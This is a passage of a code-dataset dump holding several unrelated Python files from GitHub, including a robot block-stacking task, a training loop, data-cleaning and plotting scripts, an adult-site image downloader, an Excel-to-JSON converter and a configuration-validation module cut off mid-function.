]\nmean_grad3_L_list= [x for x in snakemake.output.sbctx_mean_L if 'grad3' in x ]\n\nmean_grad1_R_list= [x for x in snakemake.output.sbctx_mean_R if 'grad1' in x ]\nmean_grad2_R_list= [x for x in snakemake.output.sbctx_mean_R if 'grad2' in x ]\nmean_grad3_R_list= [x for x in snakemake.output.sbctx_mean_R if 'grad3' in x ]\n\nget_sbctx(grad1_L_list, grad1_R_list, mean_grad1_L_list[0], mean_grad1_R_list[0],0)\nget_sbctx(grad2_L_list, grad2_R_list, mean_grad2_L_list[0], mean_grad2_R_list[0],1)\nget_sbctx(grad3_L_list, grad3_R_list, mean_grad3_L_list[0], mean_grad3_R_list[0],2)\n\n\n","repo_name":"DimuthuHemachandra/functional_gradients","sub_path":"scripts/projection_sbctx.py","file_name":"projection_sbctx.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"28981203463","text":"import numpy as np\nimport os\nimport pybullet as p\nimport random\nfrom cliport.tasks import primitives\nfrom cliport.tasks.grippers import Spatula\nfrom cliport.tasks.task import Task\nfrom cliport.utils import utils\nimport numpy as np\nfrom cliport.tasks.task import Task\nfrom cliport.utils import utils\n\nclass ColorCoordinatedBlockTower(Task):\n \"\"\"Stack four blocks on a pallet in the following order from bottom to top: \n two blue blocks side by side, one red block centered on the blue blocks, \n and one green block on top of the red block.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.max_steps = 10\n self.lang_template = \"stack four blocks on a pallet in the following order from bottom to top: two blue blocks side by side, one red block centered on the blue blocks, and one green block on top of the red block.\"\n self.task_completed_desc = \"done stacking blocks.\"\n self.additional_reset()\n\n def reset(self, env):\n super().reset(env)\n\n # Add pallet.\n # x, y, z dimensions for the asset size\n pallet_size = (0.15, 0.15, 0.015)\n pallet_urdf = 'pallet/pallet.urdf'\n pallet_pose = self.get_random_pose(env, pallet_size)\n env.add_object(pallet_urdf, pallet_pose, 'fixed')\n\n # Add blocks.\n # x, y, z dimensions for the asset size\n block_size = (0.04, 0.04, 0.04)\n block_urdf = 'block/block.urdf'\n block_colors = [utils.COLORS['blue'], utils.COLORS['blue'], utils.COLORS['red'], utils.COLORS['green']]\n blocks = []\n for i in range(4):\n block_pose = self.get_random_pose(env, block_size)\n block_id = env.add_object(block_urdf, block_pose, color=block_colors[i])\n blocks.append(block_id)\n\n # Associate placement locations for goals.\n place_pos = [(0, -0.02, 0.02), (0, 0.02, 0.02), (0, 0, 0.06), (0, 0, 0.10)]\n targs = [(utils.apply(pallet_pose, i), pallet_pose[1]) for i in place_pos]\n\n # Goal: two blue blocks are placed side by side on the pallet.\n # Break the language prompt step-by-step\n self.add_goal(objs=blocks[:2], matches=np.ones((2, 2)), targ_poses=targs[:2], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3, symmetries=[np.pi/2]*2,\n language_goal=\"place two blue blocks side by side on the pallet\")\n\n # Goal: one red block is placed centered on the blue blocks.\n self.add_goal(objs=blocks[2:3], matches=np.ones((1, 1)), targ_poses=targs[2:3], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3, symmetries=[np.pi/2],\n language_goal=\"place one red block centered on the blue blocks\")\n\n # Goal: one green block is placed on top of the red block.\n self.add_goal(objs=blocks[3:], matches=np.ones((1, 1)), 
targ_poses=targs[3:], replace=False,\n rotations=True, metric='pose', params=None, step_max_reward=1 / 3, symmetries=[np.pi/2],\n language_goal=\"place one green block on top of the red block\")","repo_name":"liruiw/GenSim","sub_path":"cliport/generated_tasks/color_coordinated_block_tower.py","file_name":"color_coordinated_block_tower.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"63"} +{"seq_id":"3280190261","text":"from tqdm import tqdm \nfrom utils import get_device\n\ndevice = get_device()\n\nclass Trainer:\n def __init__(self,model,train_loader,optimizer,criterion,device) -> None:\n self.train_losses = []\n self.train_accuracies=[]\n self.epoch_train_accuracies=[]\n if device=='cuda':\n self.model = model.cuda()\n else:\n self.model = model\n self.train_loader= train_loader\n self.optimizer = optimizer\n self.criterion =criterion\n self.device = device\n self.lr_history =[]\n\n def train(self,epoch,use_l1,lambda_l1=0.01):\n\n self.model.train()\n\n lr_trend =[]\n correct = 0\n processed=0\n train_loss=0\n\n # output looks nicer\n pbar = tqdm(self.train_loader)\n\n for batch_id,(inputs,targets) in enumerate(pbar):\n #transfer to device\n inputs = inputs.to(self.device)\n targets= targets.to(self.device)\n\n # set grad=0\n self.optimizer.zero_grad()\n\n # prediction\n outputs = self.model(inputs)\n\n # calculate loss\n loss = self.criterion(outputs,targets)\n\n # use L1 loss = Actual loss + Parameters Count\n l1=0\n if use_l1:\n for p in self.model.parameters():\n l1+=p.abs().sum()\n loss = loss+lambda_l1*l1\n\n # Plotting train_loss\n self.train_losses.append(loss.item())\n\n # backpropagation\n loss.backward()\n self.optimizer.step()\n\n # get the index of the max log-probability\n pred = outputs.argmax(dim=1,keepdim=True)\n correct += pred.eq(targets.view_as(pred)).sum().item()\n processed+=len(inputs)\n\n\n # Description\n pbar.set_description(\n desc= f\"Batch={batch_id} | Epoch={epoch} | LR={self.optimizer.param_groups[0]['lr']} | Loss={loss.item():3.4f} | Accuracy={100*correct/processed:0.4f}\"\n )\n self.train_accuracies.append(100*correct/processed)\n\n # After all the batches are done append accuracy for epoch\n self.epoch_train_accuracies.append(100*correct/processed)\n\n self.lr_history.extend(lr_trend)\n return (\n 100 * correct/processed , \n train_loss/len(self.train_loader), \n lr_trend\n )\n","repo_name":"Muthukamalan/100-days-of-coding","sub_path":"session 8/failed_archieve/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14416109693","text":"import concurrent.futures\nimport logging\nimport os\nimport re\nimport urllib.request\nimport browser_cookie3\n\nfrom bs4 import BeautifulSoup\nfrom Downloader import Downloader, Parser, STATUS_DOWNLOADING, STATUS_DOWNLOADED, STATUS_FAIL\n\n\nclass ImHentaiParser(Parser):\n\n def __init__(self, url, path, pool):\n super(ImHentaiParser, self).__init__(url, path, pool)\n\n def check(self):\n match = re.match('^https://imhentai.xxx/', self.url)\n if match is not None:\n logging.info(f'parse_imhentai.xxx')\n return True\n return False\n\n def run(self):\n try:\n #cj = browser_cookie3.chrome(domain_name='parse_imhentai.xxx')\n #logging.debug(cj)\n opener = urllib.request.build_opener()\n opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/109.0.0.0 Safari/537.36')]\n urllib.request.install_opener(opener)\n req = urllib.request.Request(self.url)\n result = urllib.request.urlopen(req, timeout=5).read()\n soup = BeautifulSoup(result, 'html.parser')\n comic_name = soup.find('p', class_='subtitle').text\n if comic_name is None or len(comic_name) == 0:\n raise Exception(\"Can't parse comic_name!\")\n # 剔除windows不合法路徑字元\n comic_name = re.sub('[\\\\\\\\<>:\"?*/\\t]', '', comic_name)\n comic_name = comic_name.strip()\n logging.debug(f'comic name = \\\"{comic_name}\\\"')\n\n match = re.match('.*/gallery/(\\\\d+)/.*', self.url)\n if match is None or match.group(1) is None:\n raise Exception(\"Can't parse media_id!\")\n\n view_id = match.group(1)\n logging.debug(f'view_id = {view_id}')\n\n li_text = soup.find('li', class_='pages').text\n if li_text is None:\n raise Exception(\"Can't parse pages!\")\n match = re.match('Pages: (\\\\d+)', li_text)\n if match is None or match.group(1) is None:\n raise Exception(\"Can't parse media_id!\")\n\n pages = match.group(1)\n logging.debug(f'pages = {pages}')\n\n req = urllib.request.Request(f'https://imhentai.xxx/view/{view_id}/1/')\n result = urllib.request.urlopen(req, timeout=5).read()\n logging.debug(result)\n soup = BeautifulSoup(result, 'html.parser')\n\n img = soup.find('img', id='gimg')\n logging.debug(f'img = {img[\"data-src\"]}')\n match = re.match('https://m7.imhentai.xxx/\\\\d+/(.+)/\\\\d+.(.+)', img['data-src'])\n if match is None or match.group(1) is None or match.group(2) is None:\n raise Exception(\"Can't parse ext!\")\n media_id = match.group(1)\n logging.debug(f'media_id = {media_id}')\n ext = match.group(2)\n logging.debug(f'ext = {ext}')\n\n self.signal.parsed.emit(ImHentaiDownloader(self.path, comic_name, self.pool, media_id, pages, ext))\n except Exception as e:\n logging.error(e)\n\n\nclass ImHentaiDownloader(Downloader):\n\n def __init__(self, path, name, pool, id, pages, ext):\n super(ImHentaiDownloader, self).__init__(f'{path}{name}', name, pool)\n self.id = id\n self.pages = int(pages)\n self.ext = ext\n self.downloaded = 0\n\n def download_url(self, url, path):\n urllib.request.urlretrieve(url, path)\n\n return self.download_url(url, path) if os.path.getsize(path) < 1 else True\n\n def run(self):\n logging.info(f'Downloading : \\\"{self.path}\\\"')\n\n try:\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n self.signal.status.emit(STATUS_DOWNLOADING)\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=32) as executor:\n future_to_url = {\n executor.submit(self.download_url, f'https://m7.imhentai.xxx/022/{self.id}/{page}.{self.ext}',\n f'{self.path}\\{page}.{self.ext}'): page for page in range(1, self.pages + 1)}\n for future in concurrent.futures.as_completed(future_to_url):\n page = future_to_url[future]\n\n try:\n if future.result():\n self.downloaded += 1\n self.signal.progress.emit(int(self.downloaded / self.pages * 100))\n # logging.info(f'Finished {self.downloaded}/{self.pages} : {progress}%')\n\n except Exception as e:\n logging.warning(f\"{e} : https://m7.imhentai.xxx/022/{self.id}/{page}.{self.ext}\")\n another_ext = 'png' if self.ext == 'jpg' else 'jpg'\n try:\n another_future = executor.submit(self.download_url,\n f'https://m7.imhentai.xxx/022/{self.id}/{page}.{another_ext}',\n f'{self.path}\\{page}.{another_ext}')\n if another_future.result():\n self.downloaded += 1\n self.signal.progress.emit(int(self.downloaded / self.pages * 100))\n except Exception as e:\n logging.error(e)\n logging.error(\n f\"fail download 
https://m7.imhentai.xxx/022/{self.id}/{page}.{another_ext}\")\n pass\n\n except Exception as e:\n raise e\n finally:\n self.signal.status.emit(STATUS_DOWNLOADED if self.downloaded == self.pages else STATUS_FAIL)\n self.signal.finished.emit()\n","repo_name":"eytu0233/HentaiDownloader","sub_path":"ImHentaiDownloader.py","file_name":"ImHentaiDownloader.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33964468890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 16 14:04:03 2021\n\n@author: poorv\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_csv('glassdoor_jobs.csv')\n\n\n\n'''\nRemove the observations where the salary data is missing\n'''\ndf=df[df['Salary Estimate']!='-1']\n\n\n'''\nRemove irrelevant Job Titles \n'''\nrelevant= ['scientist', 'data', 'analyst', 'science', 'analysis', 'insight', 'machine learning']\n\nrelevance_bool = df['Job Title'].apply(lambda title: True if any([x for x in relevant if x in title.lower()]) else False)\ndf = df[relevance_bool]\n\ndel relevance_bool, relevant\n\n\n'''\nCreate new column Salary Source by extracting information from Salary field\n'''\n\ndf['Salary Source']=df['Salary Estimate'].apply(lambda sal: sal.split('(')[1][0:-2] if 'Glassdoor' in sal else sal.split(':')[0])\ndf['Salary Estimate']=df['Salary Estimate'].apply(lambda sal: sal.split('(')[0] if 'Glassdoor' in sal else sal.split(':')[1])\n\n\n\n'''\nHandle Hourly Salaries\n'''\n#create new feature to indicate hourly\ndf['Hourly'] = df['Salary Estimate'].apply(lambda sal: 1 if 'per hour' in sal.lower() else 0)\n\n#Remove Per Hour from Salary Estimate\ndf['Salary Estimate']=df['Salary Estimate'].apply(lambda sal: sal.split('Per')[0].strip() if 'Per Hour' in sal else sal)\n\n#Remove 'K's and '$'s and convert to integers\ndf['Salary Estimate'] = df['Salary Estimate'].apply(lambda sal: sal.replace('K','',3).replace('$','',3))\n\n\n#Split to get min and max salaries as Integers\ndf['Min Salary'] = df['Salary Estimate'].apply(lambda sal: sal.split(' - ')[0] if '-' in sal else sal).astype('int32')\ndf['Max Salary'] = df['Salary Estimate'].apply(lambda sal: sal.split(' - ')[1] if '-' in sal else sal).astype('int32')\n\n\n#Multiply Hourly Salaries to get Annual Salary\n#Note that here we are using apply on a dataframe instead of a series, so the lambda will work on each row (since axis=1) instead of each cell\ndf['Min Salary'] = df.apply(lambda row: row['Min Salary']*1.72 if row['Hourly']==1 else row['Min Salary'], axis=1)\ndf['Max Salary'] = df.apply(lambda row: row['Max Salary']*1.72 if row['Hourly']==1 else row['Max Salary'], axis=1)\n\n#Get Average Salary column and drop the Salary Estimate column\ndf['Average Salary'] = (df['Min Salary']+df['Max Salary'])*0.5\n\ndf=df.drop(columns='Salary Estimate')\n\n\n'''\nCheck for Missing Values\n'''\n#df.isnull().sum()\n\n\n'''\nCheck for dupliated rows\n'''\n\n#df.duplicated().value_counts()\n\n#NOTE: 353 Rows are duplicates. 
Not an ideal dataset for Data Science but we will use it for this project.\n\n\n'''\nGroup Locations\n'''\n#df['Location'].value_counts()\n\n#define tuples (since you cannot use a list as a key in dictionaries) to group together related suburbs\nsyd_sub = tuple(['sydney', 'bella vista', 'parramatta', 'liverpool', 'alexandria', 'mascot', 'auburn'])\nmel_sub = tuple(['melbourne', 'frankston','docklands', 'melton'])\nother = tuple(['bunbury', 'darwin', 'bathurst', 'wollongong', 'gold coast'])\n\n#Define dictionary\ngroup_locations = {syd_sub:'Sydney',mel_sub:'Melbourne', other:'Other'}\n\n#Define a function to check dictionary and assign value\n#Note: we unpack the dictionary using .items() if we want to access both key and val. otherwise a for loop will iterate over the keys by default\ndef loc_simplify(location):\n    for key,val in group_locations.items():\n        if location.lower().strip() in key:\n            location = val\n    return location\n\n#Map the function over every value in the series using the apply method\ndf['Location'] = df['Location'].apply(loc_simplify)\n\n#delete instrumental objects\ndel group_locations, mel_sub, other, syd_sub\n\n\n\n'''\nNew feature: Seniority\n'''\n\nsenior = ['senior', 'lead', 'principal', 'head']\njunior = ['junior', 'entry level', 'graduate']\n\ndf['Seniority']=df['Job Title'].apply(lambda title: 'Senior' if any([x for x in senior if x in title.lower()]) else ('Junior' if any([x for x in junior if x in title.lower()]) else 'Mid'))\n\n\ndel senior, junior\n\n#df['Seniority'].value_counts()\n\n\n\n'''\nNew Feature: Job Function - Analyst vs Scientist\n'''\n#df['Job Title'].value_counts()\n\n#New Feature: Job Function - Analyst vs Scientist\nscientist = ['scientist', 'science', 'machine learning']\n\ndf['Job Function'] = df['Job Title'].apply(lambda title: 'Scientist' if any([x for x in scientist if x in title.lower()]) else 'Analyst')\n\ndel scientist\n\n\n\n'''\nGroup Company Names\n'''\n#Group the company names that occur less than four times into Other group\nval_counts=df['Company Name'].value_counts()\n\n#creating a list of companies where count<4\nother=list(val_counts.apply(lambda count: count if count<4 else None).dropna().index)\n\n#Grouping companies in the other list into a category\ndf['Company Name']=df['Company Name'].apply(lambda name: 'Other' if name in other else name)\n\n#deleting instrumental columns\ndel other, val_counts\n\n\n'''\nCombine -1 and Unknown in Size\n'''\n#df['Size'].value_counts()\n\ndf['Size'].replace('-1','Unknown', inplace=True)\n#Using Pandas replace since we are replacing the whole value of the cell. 
If we want to replace only part of it, we need to use the standard library replace with a lambda function (as we did to remove 'K' and '$')\n\n'''\nClean up the mismatched data between Founded, Ownership, Industry, Sector, Revenue\n'''\n#Moving from Sector to Revenue\n#df['Sector'].value_counts()\n\n#defining a list of values to be moved from sector to revenue\nsec_to_rev = ['$1 to $2 billion (USD)', '$500 million to $1 billion (USD)','$2 to $5 billion (USD)', '$5 to $10 million (USD)', '$10+ billion (USD)']\n\n#creating a dataframe to check if the wrong values are just stray or are to be transferred to revenue column\nwrong_sector=df[df['Sector'].isin(sec_to_rev)]\n\n#Updating Revenue and deleting from Sector\ndf['Revenue'] = df.apply(lambda row: row['Sector'] if row['Sector'] in sec_to_rev else row['Revenue'], axis=1)\ndf['Sector'].replace(sec_to_rev, 'Unknown', inplace = True)\n\ndel wrong_sector, sec_to_rev\n\n\n#Moving from Ownership to Revenue\n#df['Type of ownership'].value_counts()\n\ndf['Revenue'] = df.apply(lambda row: row['Type of ownership'] if row['Type of ownership'] =='$50 to $100 million (USD)' else row['Revenue'], axis=1)\ndf['Type of ownership'].replace('$50 to $100 million (USD)', 'Unknown', inplace = True)\n\n\n#Moving from Ownership to Industry\n#df['Type of ownership'].value_counts()\n\nown_to_ind = ['Government', 'College / University', 'Express Delivery Service', 'Hospital', 'Food & Drink Manufacturing', 'Consulting', 'Regional Agencies', 'Utilities', 'Telecommunications Service']\n\ndf['Industry'] = df.apply(lambda row: row['Type of ownership'] if row['Type of ownership'] in own_to_ind else row['Industry'], axis=1)\ndf['Type of ownership'].replace(own_to_ind, 'Unknown', inplace = True)\n\ndel own_to_ind\n\n\n#Moving from Founded to 'Type of ownership'\n#df['Founded'].value_counts()\n\nfound_to_own = ['College / University', 'Company - Private', 'Non-profit Organisation', 'Company - Public']\n\nwrong_found=df[df['Founded'].isin(found_to_own)]\n\ndf['Type of ownership'] = df.apply(lambda row: row['Founded'] if row['Founded'] in found_to_own else row['Type of ownership'], axis=1)\ndf['Founded'].replace(found_to_own, 'Unknown', inplace = True)\n\ndel found_to_own,wrong_found\n\n\n#Moving from Founded to Industry and Sector\n\ndf['Sector'] = df.apply(lambda row: row['Founded'] if row['Founded'] == 'Government' else row['Sector'], axis=1)\ndf['Industry'] = df.apply(lambda row: row['Founded'] if row['Founded'] == 'Government' else row['Industry'], axis=1)\ndf['Founded'].replace('Government', 'Unknown', inplace = True)\n\n\n\n'''\nGrouping together categories\n'''\n#Creating Others Category in Industry and Sector\n\n#Refer link below for the logic\n#https://stackoverflow.com/questions/35041628/conditionally-create-an-other-category-in-categorical-column\n\ndf['Industry'][df['Industry'].isin(df['Industry'].value_counts()[df['Industry'].value_counts()<10].index)] = 'Other'\ndf['Sector'][df['Sector'].isin(df['Sector'].value_counts()[df['Sector'].value_counts()<10].index)] = 'Other'\n\n\n#Combine -1 and Unknown in Type of Ownership, Revenue, Industry, Sector\n\ndf['Type of ownership'] = df['Type of ownership'].replace(['-1', 'Unknown / Non-Applicable'], 'Unknown')\ndf['Revenue'] = df['Revenue'].replace(['-1', 'Unknown / Non-Applicable'], 'Unknown')\ndf['Industry'] = df['Industry'].replace('-1', 'Unknown')\ndf['Sector'] = df['Sector'].replace('-1', 'Unknown')\n\n\n\n'''\nGet company age from Founded\n'''\n#df['Founded'].value_counts()\n\nfrom datetime import 
datetime\n\ndf['Founded'].replace('Unknown', '-1', inplace=True)\ndf['Company Age'] = datetime.now().year - df['Founded'].astype('int32')\n\n\n\n'''\nExtract information from Job Description\n\n'''\n\ndf['SQL'] = df['Job Description'].apply(lambda desc: 1 if 'sql' in desc.lower() else 0)\ndf.SQL.value_counts()\n\ndf['Tableau'] = df['Job Description'].apply(lambda desc: 1 if 'tableau' in desc.lower() else 0)\ndf.Tableau.value_counts()\n\ndf['Excel'] = df['Job Description'].apply(lambda desc: 1 if 'excel' in desc.lower() else 0)\ndf['Excel'].value_counts()\n\n","repo_name":"PoorvalDhotre/salary_glassdoor_aus","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14286658900","text":"# Visualize the categorical data and compute ratios\n# 22-06-2021\n# Jana Bersee, Koen Ceton, Jeroen Dijkmans, Dominique Weltevreden\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom data_processing import prepare_data\n\n# Load the data without one hot encoding\ndata_cat = prepare_data('healthcare-dataset-stroke-data.csv', one_hot = False,\n binary = False, normalize=False)\n\n# Make sure all values are strings, so plotting with histplot works\ndata_cat['hypertension'].replace(to_replace = (0, 1), value = ('no', 'yes'),\n inplace = True)\ndata_cat['heart_disease'].replace(to_replace = (0, 1), value = ('no', 'yes'),\n inplace = True)\n\n# For stroke a 1 means stroke and 0 means no stroke\ndata_cat['stroke'].replace(to_replace = (0, 1), value = ('no stroke', 'stroke'),\n inplace = True)\n\n# PLOTS\n\n# Create a figure to display multiple figures at once\nfig, axes = plt.subplots(4, 2, figsize=(20,10), sharey=True)\n\n# Adjust the settings of the subplot so titles are readable\nfig.subplots_adjust(left=None, bottom=None, right=None, top=0.95, wspace=None,\n hspace=0.25)\n\n# Add a title for the figures combined\nfig.suptitle('Figures to show categorical variables in dataset')\n\n# Pack parameters for each histplot:\nparameters = {\"data\": data_cat, \"hue\": \"stroke\", \"multiple\": \"stack\"}\n\n# Create histplots for all categorical data\nsns.histplot(ax=axes[0, 0], x = 'gender', **parameters)\nsns.histplot(ax=axes[0, 1], x = 'hypertension', **parameters)\nsns.histplot(ax=axes[1, 0], x = 'heart_disease', **parameters)\nsns.histplot(ax=axes[1, 1], x = 'ever_married', **parameters)\nsns.histplot(ax=axes[2, 0], x = 'work_type', **parameters)\nsns.histplot(ax=axes[2, 1], x = 'residence_type', **parameters)\nsns.histplot(ax=axes[3, 0], x = 'smoking_status', **parameters)\n\n# Turn off the bottom right axis as there is no plot there\naxes[3, 1].axis(\"off\")\n\n# Show the plot\nplt.show()\n\n# PROPORTIONS\n\ndef proportion(data, column_name):\n \"\"\"\n This function prints the ratios of stroke of every unique category in a\n feature (column_name)\n Ratio = samples in that category with stroke / total samples in category\n\n INPUT\n data : pandas dataframe\n column_name : str, column of which you want all the ratios per item\n\n OUTPUT\n Does not return anything, just prints the ratio per feature.\n \"\"\"\n\n # Find unique items\n uniques = data[column_name].unique()\n\n # Print instructions about the ratio\n print(f'\\nRatio = samples with stroke / total samples. 
\\n'\n          f'Feature: {column_name}')\n\n    # Loop over all the unique items\n    for item in uniques:\n\n        # Split data into different frames per unique item\n        data_item = data[data[column_name] == item]\n\n        # Total samples\n        item_total = data_item.shape[0]\n\n        # Retrieve rows of specific frame with stroke\n        data_item_stroke = data_item[data_item['stroke'] =='stroke']\n\n        # Samples with stroke\n        item_stroke = data_item_stroke.shape[0]\n\n        # Calculate ratio\n        ratio_item = item_stroke / item_total\n\n        print(f'Ratio of subgroup {item}: {ratio_item:.5f}')\n\n# Run the function on every column of the categorical data\nproportion(data_cat, 'gender')\nproportion(data_cat, 'hypertension')\nproportion(data_cat, 'heart_disease')\nproportion(data_cat, 'ever_married')\nproportion(data_cat, 'work_type')\nproportion(data_cat, 'residence_type')\nproportion(data_cat, 'smoking_status')\n","repo_name":"koenc100/Project-AI-minor","sub_path":"code/data_visual_cat.py","file_name":"data_visual_cat.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"27448363527","text":"# Repository service\nfrom knowledgePlatform.repository.models import RepositoryEntity\nimport datetime\n\n\n# Query all repositories of the given type and level\ndef get_all_repository(repository_type_arg, repository_level):\n    query_set_list = RepositoryEntity.objects.filter(repository_type=repository_type_arg, level=repository_level)\n    l = []\n    for item in query_set_list:\n        d = dict()\n        d[\"repository_name\"] = item.repository_name\n        d[\"id\"] = item.id\n        d[\"is_active\"] = \"生效\" if item.is_active == 1 else \"失效\"\n        d[\"create_date\"] = item.create_date.strftime('%Y-%m-%d %H:%M:%S')\n        d[\"update_date\"] = item.update_date.strftime('%Y-%m-%d %H:%M:%S')\n        d[\"flag\"] = 1\n\n        sub_l = []\n        query_set_sub_list = RepositoryEntity.objects.filter(parent_id=item.id)\n        for sub_item in query_set_sub_list:\n            sub_d = dict()\n            sub_d[\"repository_name\"] = sub_item.repository_name\n            sub_d[\"id\"] = sub_item.id\n            sub_d[\"is_active\"] = \"生效\" if sub_item.is_active == 1 else \"失效\"\n            sub_d[\"create_date\"] = sub_item.create_date.strftime('%Y-%m-%d %H:%M:%S')\n            sub_d[\"update_date\"] = sub_item.update_date.strftime('%Y-%m-%d %H:%M:%S')\n            sub_l.append(sub_d)\n\n        d['children'] = sub_l\n\n        l.append(d)\n    return l\n\n\ndef repository_create(repository_entity:RepositoryEntity):\n    date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n    repository_entity.create_date = date\n    repository_entity.update_date = date\n    repository_entity.save()\n    return \"ok\"\n","repo_name":"zhoajia/knowledgePlatform1","sub_path":"knowledgePlatform/repository/repository_service.py","file_name":"repository_service.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"30842906727","text":"# -*- coding: utf-8 -*-\n# This script converts Excel workbooks into UTF-8 encoded JSON files\nimport os\nimport sys\nimport codecs\nimport xlrd #http://pypi.python.org/pypi/xlrd\nimport json\nimport time\nimport ExcelInfo\nimport importlib\nimportlib.reload(sys)\n\n# Collect all file names under the given directory (searched recursively)\ndef all_path(dirname):\n    result = {}\n    for maindir, subdir, file_name_list in os.walk(dirname):\n        for filename in file_name_list:\n            apath = os.path.join(maindir, filename)\n            result[filename]=apath\n    return result\n\nif __name__ == '__main__':\n    config=json.load(open( 'Config.json','r'))\n    paths=all_path(config[\"srcFolder\"])\n    for key in paths:\n        if key[0]=='~':# skip the temporary files Excel creates for open workbooks\n            continue\n        if 
key[0]=='!':# Ignore files whose names start with '!'\n            continue\n        pair=key.split('.')\n        if len(pair)<=0:\n            continue\n        if pair[len(pair)-1]=='xlsx' or pair[len(pair)-1]=='xls':\n            print('parsing excel:'+paths[key])\n            finalJsons = ExcelInfo.ExcelInfo(paths[key],config[\"headRow\"],config[\"round\"],config[\"ignoreEmpty\"]).FinalTable()\n            for key in finalJsons:\n                outPath=config[\"destFolder\"]+'/'+ key+'.json'\n                with open(outPath,'w',encoding='UTF-8') as fileobject:\n                    if config[\"format\"]==True:\n                        fileobject.write(json.dumps(finalJsons[key],indent=4,ensure_ascii=False))\n                    else:\n                        fileobject.write(json.dumps(finalJsons[key],ensure_ascii=False))\n                print('exported json --> '+outPath)\n            print()\n\n    print(\"All OK\")\n    exit(0)\n","repo_name":"ylbs110/ExcelExportTool","sub_path":"Core/ExcelExportTool.py","file_name":"ExcelExportTool.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"63"}
{"seq_id":"40754809071","text":"# Create an empty set and print the type of it. Create a\r\n# set from a given dictionary(do set(given_dict)) and print it.\r\n# Note: The set created from the given dictionary contains\r\n# only the keys of the dictionary.\r\n\r\n\r\ndef set_creator(given_dict):\r\n    empty_set = set()\r\n    print(type(empty_set))\r\n    dict_set = set(given_dict)\r\n    print(dict_set)\r\n\r\n\r\nset_creator({1: \"Wall Street\", 2: \"Main Street\", \"Tower\": 3})\r\n","repo_name":"code4tomorrow/python","sub_path":"3_advanced/chapter17/solutions/set_creator.py","file_name":"set_creator.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"}
{"seq_id":"75216017801","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport platform\nimport re\nimport sys\nimport textwrap\n\nfrom absl import flags\nfrom six.moves import input\nfrom six.moves import range\n\n# A Google Cloud Project ID must be between 6 and 30 characters, it cannot end\n# with a hyphen, it must begin with a letter, and must be all lower case\n# letters, numbers, and hyphens.\n_PROJECT_ID_REGEX = r'^[a-z][a-z0-9-]{4,28}[a-z0-9]$'\n_PROJECT_REQUIREMENTS = (\n    'the length must be between 6 and 30 lowercase letters, numbers, and '\n    'hyphens. The first character must be a letter. 
More information can be '\n    'found in the resource reference here: https://cloud.google.com'\n    '/resource-manager/reference/rest/v1/projects#Project'\n)\n# An email address must include an `@` and a `.`.\n_EMAIL_REGEX = r'[^@]+@[^@]+\\.[^@]+'\n_EMAIL_REQUIREMENTS = 'an email address must include a `@` and `.`'\n# A Google OAuth2 Client ID must be lower case letters, numbers, and hyphens\n# followed by '.apps.googleusercontent.com'.\n_CLIENT_ID_REGEX = r'^[a-z0-9-]+\\.apps\\.googleusercontent\\.com$'\n_CLIENT_ID_REQUIREMENTS = (\n    'the OAuth2 Client ID must be lowercase letters, numbers, and hyphens '\n    'followed by `.apps.googleusercontent.com`'\n)\n# Version specifics can be found here:\n# https://cloud.google.com/appengine/docs/standard/python/config/appref\n# Characters allowed in the version string.\n# Lowercase letters, numbers, and hyphens.\n_VERSION_CHARS = frozenset((\n    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',\n    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4',\n    '5', '6', '7', '8', '9', '0', '-',\n))\n# Version strings that are reserved or otherwise not allowed.\n_VERSION_BLACKLIST = frozenset(('default', 'latest'))\n# Version cannot start with ah-\n_VERSION_CANNOT_START_WITH = 'ah-'\n# Version requirements string.\n_VERSION_REQUIREMENTS = (\n    'the version string provided: {!r} does not meet the requirements.\\n'\n    'The version string can only be composed of lower case letters, numbers, '\n    \"and hyphens. The strings 'default' and 'latest' are reserved and therefore\"\n    \" not allowed. Finally, the version string may not begin with 'ah-'.\"\n)\n\n\ndef _wrap_lines(lines, wrapper=None):\n  \"\"\"Wraps a multiline string.\n\n  Args:\n    lines: str, a multiline string to wrap.\n    wrapper: textwrap.TextWrapper, the wrapper to use for wrapping and\n      formatting.\n\n  Returns:\n    The formatted string.\n  \"\"\"\n  if wrapper is None:\n    wrapper = textwrap.TextWrapper(\n        break_on_hyphens=False,\n        break_long_words=False,\n        